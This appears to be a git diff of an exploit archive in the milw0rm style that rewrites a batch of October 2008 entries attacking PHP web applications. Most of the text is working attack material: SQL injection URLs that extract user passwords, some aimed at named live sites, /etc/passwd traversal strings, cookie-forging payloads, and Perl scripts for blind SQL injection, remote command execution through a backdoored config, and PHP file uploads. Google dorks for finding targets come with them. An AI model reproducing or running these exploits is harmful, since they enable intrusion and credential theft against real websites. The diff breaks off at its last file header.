Credit: -#################### -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -WwW.BugReport.ir -WwW.AmnPardaz.com - -# milw0rm.com [2008-10-27] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: Persia BME E-Catalogue SQL Injection Vulnerability +# Vendor: http://www.persiabme.com/products/ +# Impact: High +# Fix: N/A +# Original Advisory: http://www.bugreport.ir/index_55.htm +################################################################################### + +#################### +1. Description: +#################### + Persia BME E-Catalogue is a powerful engine which provides webmasters with advanced abilities of controlling their website. The system has a free style multi level Menu to add a company's products or services. + +#################### +2. Vulnerability: +#################### + Input passed to the "q" parameter in "search.aspx" is not properly sanitised before being used in SQL queries. +This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. +Its possible to obtain user's plain text password by this vulnerability. + + + +#################### +3. Exploits/POCs: +#################### + http://www.example.com/fa/qsearch/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)-- + +#################### +4. Solution: +#################### + Edit the source code to ensure that inputs are properly sanitized. + +#################### +5. Credit: +#################### +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +WwW.BugReport.ir +WwW.AmnPardaz.com + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6849.txt b/platforms/php/webapps/6849.txt index a44ff6faa..fafb9dd74 100755 --- a/platforms/php/webapps/6849.txt +++ b/platforms/php/webapps/6849.txt 
@@ -1,31 +1,31 @@ -############################################################# -e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability -############################################################# -[~] Author boom3rang --------------------------------- -[~] Site www.khg-crew.ws --------------------------------- -[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er & Hurley --------------------------------- -[!] Script Name: E107 -[!] Plugin Vuln: alternate_profiles/newuser.php?id= -[!] Dork: inurl:"/alternate_profiles/ -############################################################# - ---------------------------------------------------------------------------------------------------- -[-] POC: -http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit] ---------------------------------------------------------------------------------------------------- -[-] Exploit: --9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/* ---------------------------------------------------------------------------------------------------- -[-] LiveDemo: -http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/* ---------------------------------------------------------------------------------------------------- -######################################### -- United States of Albania -- Proud to be Albanian -- Proud to be Muslim -######################################### - -# milw0rm.com [2008-10-27] +############################################################# +e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability +############################################################# +[~] Author boom3rang +-------------------------------- +[~] 
Site www.khg-crew.ws +-------------------------------- +[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er & Hurley +-------------------------------- +[!] Script Name: E107 +[!] Plugin Vuln: alternate_profiles/newuser.php?id= +[!] Dork: inurl:"/alternate_profiles/ +############################################################# + +--------------------------------------------------------------------------------------------------- +[-] POC: +http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit] +--------------------------------------------------------------------------------------------------- +[-] Exploit: +-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/* +--------------------------------------------------------------------------------------------------- +[-] LiveDemo: +http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/* +--------------------------------------------------------------------------------------------------- +######################################### +- United States of Albania +- Proud to be Albanian +- Proud to be Muslim +######################################### + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6850.txt b/platforms/php/webapps/6850.txt index 718181478..ecf9fba03 100755 --- a/platforms/php/webapps/6850.txt +++ b/platforms/php/webapps/6850.txt 
@@ -1,28 +1,28 @@ -############## -# Autor: x0r -# -# Email: evolutionteam.x0[at]gmail[dot]com -# -# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip -# -# Bug: LFI -############## - -Bug: - -In \update.php - -// Include du fichier langue -if ($_GET['langage']) -{ -$langue = $_GET['langage']; -include ("lang/".$langue.".php"); -} - -Exploit: \update.php?langage=../../../../../../etc/passwd%00 - -p0wn3d Beby. - --=EOF=- - -# milw0rm.com [2008-10-27] +############## +# Autor: x0r +# +# Email: evolutionteam.x0[at]gmail[dot]com +# +# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip +# +# Bug: LFI +############## + +Bug: + +In \update.php + +// Include du fichier langue +if ($_GET['langage']) +{ +$langue = $_GET['langage']; +include ("lang/".$langue.".php"); +} + +Exploit: \update.php?langage=../../../../../../etc/passwd%00 + +p0wn3d Beby. + +-=EOF=- + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6852.pl b/platforms/php/webapps/6852.pl index 06406ed6b..8f47f2c3f 100755 --- a/platforms/php/webapps/6852.pl +++ b/platforms/php/webapps/6852.pl 
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -# ------------------------------------------------------------ -# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit -# By StAkeR[at]hotmail[dot]it -# Dork allinurl: e107_plugins/easyshop/easyshop.php -# Example http://www.clan-designs.co.uk -# easyshop/easyshop.php?choose_category=1&category_id= or 1=1 -# easyshop/easyshop.php?choose_category=1&category_id= and 1=2 -# ------------------------------------------------------------ - -use strict; -use warnings; -use LWP::UserAgent; -use URI::Escape; - -my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1); - -my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n"; -my @chars = (48..57, 97..102); -my $http = new LWP::UserAgent; - -for(0..32) -{ - foreach $ord(@chars) - { - $send = " or ascii(substring((select user_password from e107_user where user_id=1),$uid,1))=$ord/*"; - $send = uri_escape($send); - - $request = $http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&category_id=-1".$send); - - if($request->is_success and $request->content !~ /No products available/i) - { - $hash .= chr($ord); - $uid++; - } - } -} - -if(defined $hash) -{ - print STDOUT "[+] MD5: $hash\n"; - exit; -} -else -{ - print STDOUT "[?] Exploit Failed!\n"; - exit; -} - -# milw0rm.com [2008-10-27] +#!/usr/bin/perl +# ------------------------------------------------------------ +# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit +# By StAkeR[at]hotmail[dot]it +# Dork allinurl: e107_plugins/easyshop/easyshop.php +# Example http://www.clan-designs.co.uk +# easyshop/easyshop.php?choose_category=1&category_id= or 1=1 +# easyshop/easyshop.php?choose_category=1&category_id= and 1=2 +# ------------------------------------------------------------ + +use strict; +use warnings; +use LWP::UserAgent; +use URI::Escape; + +my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1); + +my $host = shift @ARGV or die "[?] 
Usage: perl $0 http://[host]\n"; +my @chars = (48..57, 97..102); +my $http = new LWP::UserAgent; + +for(0..32) +{ + foreach $ord(@chars) + { + $send = " or ascii(substring((select user_password from e107_user where user_id=1),$uid,1))=$ord/*"; + $send = uri_escape($send); + + $request = $http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&category_id=-1".$send); + + if($request->is_success and $request->content !~ /No products available/i) + { + $hash .= chr($ord); + $uid++; + } + } +} + +if(defined $hash) +{ + print STDOUT "[+] MD5: $hash\n"; + exit; +} +else +{ + print STDOUT "[?] Exploit Failed!\n"; + exit; +} + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6853.txt b/platforms/php/webapps/6853.txt index 6aa50f6f5..0755b6e7b 100755 --- a/platforms/php/webapps/6853.txt +++ b/platforms/php/webapps/6853.txt 
@@ -1,54 +1,54 @@ --------------------------------------------------------------------------------- - -Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql] - --------------------------------------------------------------------------------- -#Author: d3b4g - - -#contact: bl4ckend[at]gmail[dot]com - --------------------------------------------------------------------------------- -Affected software: --------------------------------------------------------------------------------- -Application : Questwork Web Content Management system (QuestCMS) -URL : http://www.questwork.com - --------------------------------------------------------------------------------- - -dork : allinurl:"/questcms/" --------------------------------------------------------------------------------- -Directory traversal vulnibility -============================= -Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html - -Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html - - ---------------------------------------------------------------------------------- - -sql injection: -============== -Vuln file:questcms/main/main.php?obj=[sql] - - -XSS: -==== -exploit:/main/main.php?cx=[Xss] --------------------------------------------------------------------------------- - - - --------------------------------------------------------------------------------- - -greetz: - -All my friends,milw0rm... 
- --------------------------------------------------------------------------------- - - - ---------------------------------- [ www.hotlism.org ] -------------------------------------- - -# milw0rm.com [2008-10-27] +-------------------------------------------------------------------------------- + +Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql] + +-------------------------------------------------------------------------------- +#Author: d3b4g + + +#contact: bl4ckend[at]gmail[dot]com + +-------------------------------------------------------------------------------- +Affected software: +-------------------------------------------------------------------------------- +Application : Questwork Web Content Management system (QuestCMS) +URL : http://www.questwork.com + +-------------------------------------------------------------------------------- + +dork : allinurl:"/questcms/" +-------------------------------------------------------------------------------- +Directory traversal vulnibility +============================= +Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html + +Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html + + +--------------------------------------------------------------------------------- + +sql injection: +============== +Vuln file:questcms/main/main.php?obj=[sql] + + +XSS: +==== +exploit:/main/main.php?cx=[Xss] +-------------------------------------------------------------------------------- + + + +-------------------------------------------------------------------------------- + +greetz: + +All my friends,milw0rm... + +-------------------------------------------------------------------------------- + + + +--------------------------------- [ www.hotlism.org ] -------------------------------------- + +# milw0rm.com [2008-10-27] 
diff --git a/platforms/php/webapps/6854.txt b/platforms/php/webapps/6854.txt index 5cc6b9de5..77dc52958 100755 --- a/platforms/php/webapps/6854.txt +++ b/platforms/php/webapps/6854.txt @@ -1,23 +1,23 @@ -########################################### -# Aiocp 1.4 Remote SQL Injection vulnerability -# -# Found by : ExSploiters -# -# Contact : exsploiters@gmail.com -# -# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157 -########################################### - -PoC : - -http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- - -L!ve Demo : - -http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- - -Greetz : - -no one =) - -# milw0rm.com [2008-10-27] +########################################### +# Aiocp 1.4 Remote SQL Injection vulnerability +# +# Found by : ExSploiters +# +# Contact : exsploiters@gmail.com +# +# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157 +########################################### + +PoC : + +http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- + +L!ve Demo : + +http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- + +Greetz : + +no one =) + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6855.txt b/platforms/php/webapps/6855.txt index 17c573a3d..cd03d9ecc 100755 --- a/platforms/php/webapps/6855.txt +++ b/platforms/php/webapps/6855.txt 
@@ -1,6 +1,6 @@ -MyKtools 2.4 Arbitrary Database Backup Vulnerability -By : Mountassif Moad -Exploit: http://localhost/mykdownload.php -after you get the page for download the backup - -# milw0rm.com [2008-10-27] +MyKtools 2.4 Arbitrary Database Backup Vulnerability +By : Mountassif Moad +Exploit: http://localhost/mykdownload.php +after you get the page for download the backup + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6856.txt b/platforms/php/webapps/6856.txt index 45092c4e0..d6fd8d981 100755 --- a/platforms/php/webapps/6856.txt +++ b/platforms/php/webapps/6856.txt @@ -1,31 +1,31 @@ -e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj - -author: ZoRLu - -home: z0rlu.blogspot.com - -concat: trt-turk@hotmail.com - -date: 28/10/2008 - -n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - -n0te: a.q kpss : ) ) - -dork: allinurl:"macgurublog.php?uid=" - -exploit: - -http://localhost/script_path/macgurublog.php?uid=[SQL] - -[SQL]= - --1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* - -example: - -http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* - -thanks: str0ke - -# milw0rm.com [2008-10-28] +e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj + +author: ZoRLu + +home: z0rlu.blogspot.com + +concat: trt-turk@hotmail.com + +date: 28/10/2008 + +n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +n0te: a.q kpss : ) ) + +dork: allinurl:"macgurublog.php?uid=" + +exploit: + +http://localhost/script_path/macgurublog.php?uid=[SQL] + +[SQL]= + +-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* + +example: + +http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* + +thanks: str0ke + +# milw0rm.com [2008-10-28] 
diff --git a/platforms/php/webapps/6857.txt b/platforms/php/webapps/6857.txt index 6bfa654f5..55056616b 100755 --- a/platforms/php/webapps/6857.txt +++ b/platforms/php/webapps/6857.txt @@ -1,13 +1,13 @@ -############################################################################################### -[+] MyForum 1.3 Insecure Cookie Handling Vulnerability -[+] Discovered By : Mountassif Moad -[+] Greetz : All my freind -################################################################################################ -Exploit: -javascript:document.cookie = "myforum_login=1; path=/"; - -javascript:document.cookie = "myforum_pass=1; path=/"; - -desc: if it dont work in the first test try another test - -# milw0rm.com [2008-10-28] +############################################################################################### +[+] MyForum 1.3 Insecure Cookie Handling Vulnerability +[+] Discovered By : Mountassif Moad +[+] Greetz : All my freind +################################################################################################ +Exploit: +javascript:document.cookie = "myforum_login=1; path=/"; + +javascript:document.cookie = "myforum_pass=1; path=/"; + +desc: if it dont work in the first test try another test + +# milw0rm.com [2008-10-28] diff --git a/platforms/php/webapps/6858.txt b/platforms/php/webapps/6858.txt index 8bd57ba29..c42e975ed 100755 --- a/platforms/php/webapps/6858.txt +++ b/platforms/php/webapps/6858.txt 
@@ -1,43 +1,43 @@ -|___________________________________________________ -| -| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------- Hussin X ------------------ -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| -| script : http://www.persianbb.com/ -| -| DorK : Powered By : PersianBB.com -|___________________________________________________ - -Exploit: -________ - - -www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- - - -Demo: -________ - -http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- - - - -________________( Greetz )_____________________ - _____ ____ __ __ _ ____ -|_ _| | _ \ \ \ / / / \ / ___| - | | | |_) | \ V / / _ \ | | _ - | | | _ < | | / ___ \ | |_| | - |_| |_| \_\ |_| /_/ \_\ \____| -_______________________________________________ - -# milw0rm.com [2008-10-28] +|___________________________________________________ +| +| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------- Hussin X ------------------ +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| +| script : http://www.persianbb.com/ +| +| DorK : Powered By : PersianBB.com +|___________________________________________________ + +Exploit: +________ + + +www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- + + +Demo: +________ + +http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- + + + +________________( Greetz )_____________________ + _____ ____ __ __ _ ____ +|_ _| | _ \ \ \ / / / \ 
/ ___| + | | | |_) | \ V / / _ \ | | _ + | | | _ < | | / ___ \ | |_| | + |_| |_| \_\ |_| /_/ \_\ \____| +_______________________________________________ + +# milw0rm.com [2008-10-28] diff --git a/platforms/php/webapps/6859.txt b/platforms/php/webapps/6859.txt index 572f7e585..678c1bc5c 100755 --- a/platforms/php/webapps/6859.txt +++ b/platforms/php/webapps/6859.txt 
@@ -1,34 +1,34 @@
-**************************************************************************************
-
-Author : DaRkLiFe
-Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
-
-**************************************************************************************
-Script :
-
-ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
-
-Home Page :
-
-http://agaresmedia.com
-
-Download :
-
-http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
-
-**************************************************************************************
-
-Exploit :
-
-http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
-
-**************************************************************************************
-
-Vulnerable : line 2 :
-
-**************************************************************************************
-
-THANKS ! GREETZ ! HAPPY DIWALI !
-**************************************************************************************
-
-# milw0rm.com [2008-10-28]
+**************************************************************************************
+
+Author : DaRkLiFe
+Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
+
+**************************************************************************************
+Script :
+
+ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
+
+Home Page :
+
+http://agaresmedia.com
+
+Download :
+
+http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
+
+**************************************************************************************
+
+Exploit :
+
+http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
+
+**************************************************************************************
+
+Vulnerable : line 2 :
+
+**************************************************************************************
+
+THANKS ! GREETZ ! HAPPY DIWALI !
+**************************************************************************************
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6860.txt b/platforms/php/webapps/6860.txt
index 32c3ecd15..eefa5a59d 100755
--- a/platforms/php/webapps/6860.txt
+++ b/platforms/php/webapps/6860.txt
@@ -1,20 +1,20 @@
--========================================-
-Autore: x0r
-Email: evolutionteam.x0 [at] gmail.com
-Cms: TlGuestBook v 1.2
-Bug: Insecure Cookie Handling Vulnerability
-Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
--========================================-
-
-Exploit:
-
-javascript:document.cookie = "tlGuestBook_login=admin; path=/"
-
-Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
-Andrea ( HaveStyle), str0ke :P
-
-^^'' p0wn3d Beby.
-
--=EOF=-
-
-# milw0rm.com [2008-10-28]
+-========================================-
+Autore: x0r
+Email: evolutionteam.x0 [at] gmail.com
+Cms: TlGuestBook v 1.2
+Bug: Insecure Cookie Handling Vulnerability
+Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
+-========================================-
+
+Exploit:
+
+javascript:document.cookie = "tlGuestBook_login=admin; path=/"
+
+Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
+Andrea ( HaveStyle), str0ke :P
+
+^^'' p0wn3d Beby.
+
+-=EOF=-
+
+# milw0rm.com [2008-10-28]
diff --git a/platforms/php/webapps/6861.pl b/platforms/php/webapps/6861.pl
index a5cd7570e..eb983d761 100755
--- a/platforms/php/webapps/6861.pl
+++ b/platforms/php/webapps/6861.pl
@@ -1,69 +1,69 @@ -#!/usr/bin/perl -# ---------------------------------------------------------- -# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off) -# Discovered By StAkeR[at]hotmail[dot]it -# Download On http://sourceforge.net/projects/h2o-cms -# ---------------------------------------------------------- - -use strict; -use LWP::UserAgent; -use LWP::Simple; - -my $post; -my $sysc; -my $host = shift or athos(); -my $auth = "user=admin&id=1&admin=1"; -my $http = new LWP::UserAgent; - -my $write = { - 'site_title' => '";""; error_reporting(0); echo"//athos"; "', - 'db_server' => '";""; include($_REQUEST["i"]); "', - 'db_name' => '";""; eval($_REQUEST["g"]); "', - 'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "', - 'db_password' => '";""; echo system($_REQUEST["s"]); "', - 'save' => 'Save', - }; - - -$http->default_header('Cookie' => $auth); -$post = $http->post($host.'/index.php?option=SaveConfig',$write); - - -sub start_exec -{ - my $site = shift @_; - my $exec = shift @_; - my $view = get($site.'/includes/config.php?c='.$exec); - - return $view; -} - -sub athos -{ - print STDOUT "# Usage: perl $0 http://[host]\n"; - print STDOUT "# Remote Command Execution Exploit\n"; - exit; -} - -unless(get($host) =~ /\/\/athos/i) -{ - print STDOUT "# Exploit Failed!\n"; - exit; -} -else -{ - while(1) - { - if(defined start_exec($host,$sysc)) - { - print STDOUT "[athos-shell] ~# "; - chomp($sysc = ); - - print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n"; - } - } -} - -__END__ - -# milw0rm.com [2008-10-28] +#!/usr/bin/perl +# ---------------------------------------------------------- +# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off) +# Discovered By StAkeR[at]hotmail[dot]it +# Download On http://sourceforge.net/projects/h2o-cms +# ---------------------------------------------------------- + +use strict; +use LWP::UserAgent; +use LWP::Simple; + +my $post; +my $sysc; +my $host = shift or athos(); +my $auth = "user=admin&id=1&admin=1"; 
+my $http = new LWP::UserAgent; + +my $write = { + 'site_title' => '";""; error_reporting(0); echo"//athos"; "', + 'db_server' => '";""; include($_REQUEST["i"]); "', + 'db_name' => '";""; eval($_REQUEST["g"]); "', + 'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "', + 'db_password' => '";""; echo system($_REQUEST["s"]); "', + 'save' => 'Save', + }; + + +$http->default_header('Cookie' => $auth); +$post = $http->post($host.'/index.php?option=SaveConfig',$write); + + +sub start_exec +{ + my $site = shift @_; + my $exec = shift @_; + my $view = get($site.'/includes/config.php?c='.$exec); + + return $view; +} + +sub athos +{ + print STDOUT "# Usage: perl $0 http://[host]\n"; + print STDOUT "# Remote Command Execution Exploit\n"; + exit; +} + +unless(get($host) =~ /\/\/athos/i) +{ + print STDOUT "# Exploit Failed!\n"; + exit; +} +else +{ + while(1) + { + if(defined start_exec($host,$sysc)) + { + print STDOUT "[athos-shell] ~# "; + chomp($sysc = ); + + print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n"; + } + } +} + +__END__ + +# milw0rm.com [2008-10-28] diff --git a/platforms/php/webapps/6862.txt b/platforms/php/webapps/6862.txt index a7d984dde..5bbcc6c76 100755 --- a/platforms/php/webapps/6862.txt +++ b/platforms/php/webapps/6862.txt 
@@ -1,10 +1,10 @@ -# ---------------------------------------------------------- -# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability -# Discovered By Mountassif Moad -# Download On http://sourceforge.net/projects/h2o-cms -# Home World http://v4-team.com -# ---------------------------------------------------------- -Exploit: -javascript:document.cookie = "admin=1; path=/"; - -# milw0rm.com [2008-10-29] +# ---------------------------------------------------------- +# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability +# Discovered By Mountassif Moad +# Download On http://sourceforge.net/projects/h2o-cms +# Home World http://v4-team.com +# ---------------------------------------------------------- +Exploit: +javascript:document.cookie = "admin=1; path=/"; + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6866.pl b/platforms/php/webapps/6866.pl index 3540103a6..8eacb7da4 100755 --- a/platforms/php/webapps/6866.pl +++ b/platforms/php/webapps/6866.pl 
@@ -1,52 +1,52 @@ -#!/usr/bin/perl - -use warnings; -use strict; -use LWP::UserAgent; -use HTTP::Request::Common; - -my $fname = rand(1000) . ".php"; # int.. yes i know PU! - -print < Spoofing + -+ Discovered && Coded By: t0pP8uZz + -+ + -+ Contact IRC: irc.rizon.net #sectalk + -+ Vendor not notified! Later versions maybe vuln! + -+ + -+ Discovered On: 25 October 2008 / milw0rm.com + -+ + -+ Script Download: http://7shop.de + -+++++++++++++++++++++++++++++++++++++++++++++++++++++ -INTRO - -print "\nEnter URL(ie: http://site.com/shop): "; - chomp(my $url=); - -print "\nEnter File Path(path to local file to upload): "; - chomp(my $file=); - -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url.'/includes/imageupload.php', - Content_Type => 'form-data', - Content => [ img1 => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); - -die "HTTP POST Failed!" unless $re->is_success; - -if($re->content =~ /File is valid/) { - - print "File successfully uploaded! Access your file here: " . $url . "/images/artikel/" . $fname . "\n"; # say()? nah you havent got perl510 yet. have you! -} -elsif($re->content =~ /The requested URL/) { # apache debug only - - print "File Upload Failed! The requested target was not running a vulnerable version of 7shop!\n"; -} -else { - - print "File Upload Failed! target vulnerable, but upload failed.. try changing filename.\n"; -} -exit; - -# milw0rm.com [2008-10-29] +#!/usr/bin/perl + +use warnings; +use strict; +use LWP::UserAgent; +use HTTP::Request::Common; + +my $fname = rand(1000) . ".php"; # int.. yes i know PU! + +print < Spoofing + ++ Discovered && Coded By: t0pP8uZz + ++ + ++ Contact IRC: irc.rizon.net #sectalk + ++ Vendor not notified! Later versions maybe vuln! 
+ ++ + ++ Discovered On: 25 October 2008 / milw0rm.com + ++ + ++ Script Download: http://7shop.de + ++++++++++++++++++++++++++++++++++++++++++++++++++++++ +INTRO + +print "\nEnter URL(ie: http://site.com/shop): "; + chomp(my $url=); + +print "\nEnter File Path(path to local file to upload): "; + chomp(my $file=); + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url.'/includes/imageupload.php', + Content_Type => 'form-data', + Content => [ img1 => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); + +die "HTTP POST Failed!" unless $re->is_success; + +if($re->content =~ /File is valid/) { + + print "File successfully uploaded! Access your file here: " . $url . "/images/artikel/" . $fname . "\n"; # say()? nah you havent got perl510 yet. have you! +} +elsif($re->content =~ /The requested URL/) { # apache debug only + + print "File Upload Failed! The requested target was not running a vulnerable version of 7shop!\n"; +} +else { + + print "File Upload Failed! target vulnerable, but upload failed.. try changing filename.\n"; +} +exit; + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6867.pl b/platforms/php/webapps/6867.pl index 474a49fa3..20171b7b6 100755 --- a/platforms/php/webapps/6867.pl +++ b/platforms/php/webapps/6867.pl 
@@ -1,58 +1,58 @@ -#!/usr/bin/perl - -use warnings; -use strict; -use LWP::UserAgent; -use HTTP::Request::Common; - -my $fname = rand(99999) . ".php"; # no int() - -print <); - -print "\nEnter File Path(path to local file to upload): "; - chomp(my $file=); - -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php', - Content_Type => 'form-data', - Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] ); - -die "Exploit Failed: HTTP POST Failed!" unless $re->is_success; - -if($re->content =~ /Fatal error/i) { - print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n"; - print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n"; -} else -{ - print "Exploit Failed! Target host not vulnerable!\n"; -} -exit; - -# milw0rm.com [2008-10-29] +#!/usr/bin/perl + +use warnings; +use strict; +use LWP::UserAgent; +use HTTP::Request::Common; + +my $fname = rand(99999) . ".php"; # no int() + +print <); + +print "\nEnter File Path(path to local file to upload): "; + chomp(my $file=); + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php', + Content_Type => 'form-data', + Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] ); + +die "Exploit Failed: HTTP POST Failed!" unless $re->is_success; + +if($re->content =~ /Fatal error/i) { + print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n"; + print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n"; +} else +{ + print "Exploit Failed! Target host not vulnerable!\n"; +} +exit; + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6868.pl b/platforms/php/webapps/6868.pl index c19b92501..f9156aab8 100755 --- a/platforms/php/webapps/6868.pl 
